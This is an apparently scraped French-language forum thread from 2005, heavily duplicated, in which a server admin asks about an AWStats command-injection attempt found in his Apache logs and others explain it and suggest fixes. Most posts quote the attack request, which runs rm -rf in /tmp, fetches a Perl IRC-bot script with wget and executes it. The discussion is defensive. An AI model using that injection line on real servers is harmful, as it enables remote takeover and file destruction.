Bonjour
J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).
Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Jean-Francois BILLAUD
scripsit Bernard :
Bonjour
Bonjour,
J'ai un petit serveur APACHE sous WIndows, pour l'instant. En analysant mes log apache j'ai remarqué une activité anormale : 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*; wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
- lire les alertes de sécurité (s'abonner à la liste d'information mises à jour ou sécurité de votre distribution) ; - mettre le système à jour (noyau, logiciel de base) ; - mettre à jour Apache PHP MySQL ; - mettre à jour les scripts PHP (c'est probablement le point le plus faible) ; - utiliser chkrootkit ou rkhunter ; - lire les logs.
Merci de votre attention
Pas de quoi.
JFB
-- "Murphy's Law, that brash proletarian restatement of Godel's Theorem ..." -- Thomas Pynchon, "Gravity's Rainbow"
scripsit Bernard :
Bonjour
Bonjour,
J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).
Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).
- lire les alertes de sécurité (s'abonner à la liste d'information mises à jour
ou sécurité de votre distribution) ;
- mettre le système à jour (noyau, logiciel de base) ;
- mettre à jour Apache PHP MySQL ;
- mettre à jour les scripts PHP (c'est probablement le point le plus faible) ;
- utiliser chkrootkit ou rkhunter ;
- lire les logs.
Merci de votre attention
Pas de quoi.
JFB
--
"Murphy's Law, that brash proletarian restatement of Godel's Theorem ..."
-- Thomas Pynchon, "Gravity's Rainbow"
J'ai un petit serveur APACHE sous WIndows, pour l'instant. En analysant mes log apache j'ai remarqué une activité anormale : 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*; wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
- lire les alertes de sécurité (s'abonner à la liste d'information mises à jour ou sécurité de votre distribution) ; - mettre le système à jour (noyau, logiciel de base) ; - mettre à jour Apache PHP MySQL ; - mettre à jour les scripts PHP (c'est probablement le point le plus faible) ; - utiliser chkrootkit ou rkhunter ; - lire les logs.
Merci de votre attention
Pas de quoi.
JFB
-- "Murphy's Law, that brash proletarian restatement of Godel's Theorem ..." -- Thomas Pynchon, "Gravity's Rainbow"
Jacques Caron
Salut,
On 14 Jul 2005 23:37:26 GMT, Bernard <"bfermaut atfreedotfr"@news53rd.b1.woo> wrote:
J'ai un petit serveur APACHE sous WIndows, pour l'instant. En analysant mes log apache j'ai remarqué une activité anormale : 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Plus précisément, c'est une attaque par code injection sur awstats, qui est un module de stats pour Apache en perl, qui doit probablement aussi très bien tourner sous Windows. Ceci dit, pour que l'attaque fonctionne sous Windows il faudrait que des outils comme rm ou wget soient disponibles, mais je ne serais pas étonné que certaines distributions de perl pour Windows le fassent aussi.
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
Mettre à jour awstats...
Jacques.
Salut,
On 14 Jul 2005 23:37:26 GMT, Bernard <"bfermaut
atfreedotfr"@news53rd.b1.woo> wrote:
J'ai un petit serveur APACHE sous WIndows, pour l'instant.
En analysant mes log apache j'ai remarqué une activité anormale :
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).
Plus précisément, c'est une attaque par code injection sur awstats, qui
est un module de stats pour Apache en perl, qui doit probablement aussi
très bien tourner sous Windows. Ceci dit, pour que l'attaque fonctionne
sous Windows il faudrait que des outils comme rm ou wget soient
disponibles, mais je ne serais pas étonné que certaines distributions de
perl pour Windows le fassent aussi.
Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).
On 14 Jul 2005 23:37:26 GMT, Bernard <"bfermaut atfreedotfr"@news53rd.b1.woo> wrote:
J'ai un petit serveur APACHE sous WIndows, pour l'instant. En analysant mes log apache j'ai remarqué une activité anormale : 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Plus précisément, c'est une attaque par code injection sur awstats, qui est un module de stats pour Apache en perl, qui doit probablement aussi très bien tourner sous Windows. Ceci dit, pour que l'attaque fonctionne sous Windows il faudrait que des outils comme rm ou wget soient disponibles, mais je ne serais pas étonné que certaines distributions de perl pour Windows le fassent aussi.
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
Mettre à jour awstats...
Jacques.
Delf
Bernard wrote:
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
N'autoriser l'accès à awStats uniquement en local ?
-- Delf
Bernard wrote:
Comme je suis en train de passer à LINUX, je me demande que faire pour se
prémunir de ce genre de situation (paramétrage apache, firewall, ...).
N'autoriser l'accès à awStats uniquement en local ?
Comme je suis en train de passer à LINUX, je me demande que faire pour se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
N'autoriser l'accès à awStats uniquement en local ?
-- Delf
Clement Lecigne
On Thu, 14 Jul 2005 23:37:26 +0000, Bernard wrote:
Bonjour Bonjour,
(...) 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293 Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Pour moi ce n'est pas devenu une activité anormale, des requêtes de ce genre j'en reçois au moins une tous les 2 jours. Elles proviennent de worms, de scanneur, ou d'humain ;o). Dans ce cas, il est question d'exploiter une faille contenue dans AWStats =< 6.2 qui permet l'execution de commandes à distance (/stats/awstats.pl?configdir=|cmd|) [1]. Ici le pirate fais le ménage dans /tmp, télécharge un script perl (www.members.lycos.co.uk/ramona/s), l'execute puis le supprime. Ce script perl écrit par un italien (cf commentaires), pour ce que j'ai vu, se cache dans les processus sous le nom `sh -i', il se connecte sur IRC au réseau undernet sous le nick de ramonaXXXX sur le canal #goplanet, il peut être alors commandé à partir d'IRC, on peut lui faire éxecuter divers commandes. Curieux, je suis aller voir sur ce canal, il y avait une dizaine de ramonaXXX et autant d'op^Wpirates qui passent leur journée à controler leur ramona ;o).
Comme je suis en train de passer à LINUX, je me demande que faire pour
se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
Avoir un système à jour, se tenir au courant des nouvelles vulnérabilités ... Dans ce cas là, tu n'as aucune crainte à avoir puisque tu n'as pas d'AWStats qui tournent (du moins pas dans /stats) et donc l'attaque a échoué comme l'indique l'erreur 404.
Merci de votre attention Bernard
De rien, Clément.
[1] http://www.securityfocus.com/bid/12298
On Thu, 14 Jul 2005 23:37:26 +0000, Bernard wrote:
Bonjour
Bonjour,
(...)
213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo|
HTTP/1.1" 404 293
Avec l'ami Google, je me suis rendu compte que c'est une tentative
d'intrusion mais pour de l'UNIX (ou LINUX!).
Pour moi ce n'est pas devenu une activité anormale, des requêtes de ce
genre j'en reçois au moins une tous les 2 jours. Elles proviennent de
worms, de scanneur, ou d'humain ;o).
Dans ce cas, il est question d'exploiter une faille contenue dans AWStats
=< 6.2 qui permet l'execution de commandes à distance
(/stats/awstats.pl?configdir=|cmd|) [1]. Ici le pirate fais le ménage dans
/tmp, télécharge un script perl (www.members.lycos.co.uk/ramona/s),
l'execute puis le supprime. Ce script perl écrit par un italien (cf
commentaires), pour ce que j'ai vu, se cache dans les processus sous
le nom `sh -i', il se connecte sur IRC au réseau undernet sous le nick de
ramonaXXXX sur le canal #goplanet, il peut être alors commandé à partir
d'IRC, on peut lui faire éxecuter divers commandes.
Curieux, je suis aller voir sur ce canal, il y avait une dizaine de
ramonaXXX et autant d'op^Wpirates qui passent leur journée à controler
leur ramona ;o).
Comme je suis en train de passer à LINUX, je me demande que faire
pour
se prémunir de ce genre de situation (paramétrage apache, firewall,
...).
Avoir un système à jour, se tenir au courant des nouvelles vulnérabilités
... Dans ce cas là, tu n'as aucune crainte à avoir puisque tu n'as pas
d'AWStats qui tournent (du moins pas dans /stats) et donc l'attaque a
échoué comme l'indique l'erreur 404.
On Thu, 14 Jul 2005 23:37:26 +0000, Bernard wrote:
Bonjour Bonjour,
(...) 213.195.205.243 - - - [14/Jul/2005:18:32:34 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20www.members.lycos.co.uk/ramona/s;perl%20s;echo%20;rm%20-rf%20s*;echo| HTTP/1.1" 404 293 Avec l'ami Google, je me suis rendu compte que c'est une tentative d'intrusion mais pour de l'UNIX (ou LINUX!).
Pour moi ce n'est pas devenu une activité anormale, des requêtes de ce genre j'en reçois au moins une tous les 2 jours. Elles proviennent de worms, de scanneur, ou d'humain ;o). Dans ce cas, il est question d'exploiter une faille contenue dans AWStats =< 6.2 qui permet l'execution de commandes à distance (/stats/awstats.pl?configdir=|cmd|) [1]. Ici le pirate fais le ménage dans /tmp, télécharge un script perl (www.members.lycos.co.uk/ramona/s), l'execute puis le supprime. Ce script perl écrit par un italien (cf commentaires), pour ce que j'ai vu, se cache dans les processus sous le nom `sh -i', il se connecte sur IRC au réseau undernet sous le nick de ramonaXXXX sur le canal #goplanet, il peut être alors commandé à partir d'IRC, on peut lui faire éxecuter divers commandes. Curieux, je suis aller voir sur ce canal, il y avait une dizaine de ramonaXXX et autant d'op^Wpirates qui passent leur journée à controler leur ramona ;o).
Comme je suis en train de passer à LINUX, je me demande que faire pour
se prémunir de ce genre de situation (paramétrage apache, firewall, ...).
Avoir un système à jour, se tenir au courant des nouvelles vulnérabilités ... Dans ce cas là, tu n'as aucune crainte à avoir puisque tu n'as pas d'AWStats qui tournent (du moins pas dans /stats) et donc l'attaque a échoué comme l'indique l'erreur 404.
Merci de votre attention Bernard
De rien, Clément.
[1] http://www.securityfocus.com/bid/12298
jack
Si qqun a recupere le script perl pour analyse ca m'interesse.
Si qqun a recupere le script perl pour analyse ca m'interesse.
